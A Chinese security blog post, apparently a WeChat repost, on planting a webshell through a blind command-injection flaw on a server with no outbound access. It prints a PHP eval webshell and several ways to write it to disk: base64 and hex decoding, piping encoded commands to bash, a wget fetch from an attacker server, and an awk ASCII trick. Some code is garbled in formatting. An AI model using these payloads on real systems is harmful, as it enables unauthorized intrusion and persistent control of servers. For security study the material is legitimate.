免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1
Start
前端时间碰到一个站点,本身那个框架存在一个无回显的命令执行漏洞,平时验证的时候都是让它ping一下dnslog,但是那个站点执行ping动作后,dnslog没有一点反应,but执行payload的响应跟存在漏洞的响应返回非常相似,怀疑是个不出网的设备。漏洞的细节暂不公开,咱们今天主要聊聊极限环境下如何利用这个命令执行写入webshell。
2
Action
在搞之前咱们先回顾一下通常情况下的命令执行,我们如何写webshell呢?
========================================================
以下内容主要借鉴文章:https://developer.volcengine.com/articles/7381516634714079242
========================================================
1、echo直接写入
echo '<?php eval($_POST[1]); ?>' > 1.php直接写入webshell一般不会成功,因为webshell中使用的某些关键符号可能被转码或屏蔽
2、base64写入
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php使用base64是比较通用的方法,完美去除了webshell本身的特殊字符
3、绕过重定向符
echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bashecho "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh重定向符>不可用时,我们可以将1或2中的整体命令base64编码,然后解码后通过bash或sh执行,其他字符绕过方式,如空格对应${IFS}等
4、远端下载webshell
远端服务器放置webshell,开启httppython -m http.server目标机器执行wget http://xx.xx.xxx.xx:8000/xxx.php
可出网且有wget的情况下可采用此方式
5、hex写入
hex写入与base64写入相似,在 https://www.107000.com/T-Hex/
将webshell编码成hex,使用xxd命令还原
或在使用前将webshell使用xxd生成hex数据
echo '<?php eval($_POST[1]); ?>' |xxd -ps然后命令注入执行
echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 5.php========================================================
# 要处理的字符串text = '<%out.print("1");%>'# 打开文件以写入with open('ascii_values.txt', 'w') as file:for char in text:# 写入每个字符的 ASCII 值,每行一个file.write(f"{ord(char)}n")
结果长这样
6037111117116461121141051101164034493441593762
60n37n111n117n116n46n112n114n105n110n116n40n34n49n34n41n59n37n62nprintf "60n37n111n117n116n46n112n114n105n110n116n40n34n49n34n41n59n37n62n" > /xxxxx/1.txtawk '{ printf "%c", $1 }' /xxxxx/1.txt > /xxxxx/1.jsp
3
End
业务咨询/网络安全教学可添加主页微信咨询,欢迎打扰~
原文始发于微信公众号(跟着斯叔唠安全):命令执行不出网、无回显、连基础工具base64/xxd都没有?极限生存下的命令执行,怎么打?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论